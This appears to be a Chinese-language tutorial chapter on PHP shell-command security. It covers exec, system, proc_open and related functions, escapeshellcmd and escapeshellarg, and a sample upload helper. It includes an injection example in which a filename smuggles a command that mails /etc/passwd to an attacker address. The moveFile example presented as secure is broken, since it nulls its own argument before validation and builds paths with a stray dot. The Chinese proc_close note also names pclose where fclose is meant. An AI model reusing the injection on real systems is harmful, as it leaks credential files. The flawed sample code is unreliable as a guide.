导读:本章内容主要说了PHP程序和系统的交互安全问题。
详细:
1 PHP提供的5种系统交互方法
方法位于进程控制扩展中的Program execution。此扩展是PHP核心的一部分,没有依赖扩展,不能在php.ini中配置。
扩展定义了一种叫 process 的资源类型,由proc_open返回。没有预定义常量。
全部函数(红色部分为可接收命令并执行函数):
escapeshellcmd — Escape shell metacharacters
转义或在字符串的任何字符之前插入斜线,返回一个标准化的字符串。将该字符串传递给操作系统相对安全。如,用户输入:
foo.txt;mail hacker@ex.com < /etc/passwd;
则在使用escapeshellcmd后,为变成:
$safe_cmd = escapeshellcmd($_POST['filename']); // foo.txt\;mail hacker\@ex\.com \< \/etc\/passwd\;
escapeshellarg— Escape a string to be used as a shell argument
将整个要发送给操作系统的字符串封装在单引号中,消除通配符或其他特殊字符被操作系统解释。这是确保应用程序安全的有效方法之一。
exec — Execute an external program
执行给定的外部系统命令。
passthru — Execute an external program and display raw output
执行给定的外部命令,并返回输出命令执行状态。
proc_close — Close a process opened by proc_open and return the exit code of that process
proc_close() is similar to pclose() except that it only works on processes opened by proc_open(). proc_close() waits for the process to terminate, and returns its exit code. If you have open pipes to that process, you should fclose() them prior to calling
this function in order to avoid a deadlock - the child process may not be able to exit while the pipes are open.
和pclose类似,仅仅对proc_open打开的进程有效。当进程运行结束时,返回程序退出码。如果进程已经打开管道,为防止死锁,需要调用pclose关闭它,因为管道打开时,会导致子进程无法退出。
proc_get_status — Get information about a process opened by proc_open
过去由proc_open打开的进程信息。主要是(来自php.net):
| element | type | description |
|---|---|---|
| command | string | The command string that was passed to proc_open(). |
| pid | int | process id |
| running | bool | TRUE if the process is still running, FALSE ifit has terminated. |
| signaled | bool | TRUE if the child process has beenterminated by an uncaught signal. Always set to FALSE on Windows. |
| stopped | bool | TRUE if the child process has beenstopped by a signal. Always set to FALSE on Windows. |
| exitcode | int | The exit code returned by the process (which is only meaningful if running isFALSE).Only first call of this function return real value, next calls return -1. |
| termsig | int | The number of the signal that caused the child process to terminate its execution (only meaningful if signaled is TRUE). |
| stopsig | int | The number of the signal that caused the child process to stop its execution (only meaningful if stopped is TRUE). |
proc_nice — Change the priority of the current process
改变当前进程的优先级。
proc_open — Execute a command and open file pointers for input/output
执行一个命令,并打开input、output文件指针。
proc_terminate — Kills a process opened by proc_open
结束一个由proc_open打开的进程。
shell_exec — Execute command via shell and return the complete output as a string
通过shell执行一个命令,并使用一个字符串返回全部输出。
system — Execute an external program and display the output
执行一个外部命令,并打印输出。
2 moveFile函数
对于安全问题,建立自定义的API进行过滤,如保存用户上传文件:
<?php
function moveFile($filename)
{
// 初始化变量
$filename = NULL;
$TMP_PATH = '/www/uploads';
$FINAL_PATH = '/home/gusetbook/uploads';
// 验证文件名
if(preg_match('/^[A-Za-z0-9].*\.[a-z]{0,3}$/', $filename)){
$filename = escapeshellarg($filename);
} else {
return false;
}
return exec("mv $TMP_PATH.$filename $FINAL_PATH.$filename");
}
3 其他防范措施
-服务器删除sudo命令。
-限制系统调用。